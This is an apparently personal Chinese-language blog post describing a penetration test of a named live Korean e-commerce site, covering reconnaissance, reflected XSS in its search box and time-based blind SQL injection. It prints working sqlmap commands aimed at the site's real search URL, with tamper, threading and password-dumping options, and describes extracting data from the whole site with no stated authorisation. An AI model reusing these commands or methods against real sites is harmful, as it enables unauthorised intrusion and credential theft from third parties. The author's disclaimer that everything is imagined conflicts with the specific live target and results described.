1,信息收集
2,漏洞探测
3,漏洞利用
渗透测试漏洞挖掘,本质上就是一个不断失败的循环,尝试 -> 失败 -> 继续尝试 ->继续失败 -> ....
只有习惯了失败,不再抗拒失败,从容的接受失败,平静的进行下一次尝试,才是成为一个合格的渗透测试工程师的关键因素。
下面所叙述的一切都是我的潜意识臆想,都是不存在的事情
壹 信息收集
一个前端设计还蛮不错的电商站点:
一个前端设计还蛮不错的电商站点
首先全球ping一下:
虽然没有ping通,但是国内外的ip都是一样的,基本可以排除CDN
nmap试一下,端口开放的实在是太少了点。只有80和443端口
探测后端服务版本:
同样没有什么结果...
贰 漏洞探测
目前知道的信息也是寥寥无几,看看网站web有没有什么可以利用的地方
有一个搜索框:
搜索admin,直接在页面上回显:
尝试基础XSS:
漏洞点,反射型XSS注入,可用于用户的呢过路情况下恶意钓鱼链接,盗取用户cookie
在这里尝试一下能不能进行SQL注入:
搜索框的POST数据会直接通过GET传给服务器,现在只需要通过尝试构造url:
OMG
单引号就报错,而且还知道后台数据库用的就是Oracle
尝试几个寻找列数以及常用函数,报错注入无果后,初步判断存在盲注的注入漏洞,直接加上sqlmap跑:
[root@AlexzKali ~/sqlmap]# sqlmap -r kroweb.txt -p kwd --dbms oracle --random-agent --tamper= equaltolike,between --delay 2 --time-sec 3 --batch
这里用了两个脚本:--tamper= eqyualtolike,between 分别是对盲注中出现的 > = 这两个常用符号的转换
很好,一个基于时间盲注SQL注入
但是这里出现了一个问题,就是在我的虚拟机Kali上面一直跑不出来数据,以为是国外网站,又加上是基于实践的盲注,所以我有理由怀疑网络的问题导致无法跑出数据,需要耐心的调整关于时间的各个参数;
因为虚拟机kali上面没有梯子,我就换在了win10上面的sqlmap脚本跑,基于时间盲注很慢很慢,我使用了多线程加上DNS服务器的重代理;
这里我就放出最后跑出数据的参数吧:
python sqlmap.py -u "https://www.litem.co.kr/Mall/Shop/ItemList.asp?Act=SEARCH&kwd=xxyyzz" --dbms oracle --random-agent --tamper=equaltolike,between --delay 1 --time-sec 3 --batch --passwords --hex --threads 100 --dns-domain=hn.kd.ny.adsl
前前后后总共跑了整站一个小时的时间;
大功告成,基本上到这儿,就可以撰写报告结束渗透了,因为以我的垃圾水平,也只能这样了...
路漫漫那其修远兮吧,不断学习不断成长才是最终的归途
献给我的人生第一个漏洞
渗透测试就像人生一样,很多时候重要的在于经历的过程,而非最终的结果
毕竟生命本身就没有任何意义,意义在于我们彼此此刻的存在,而已
分享今日份的msf
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'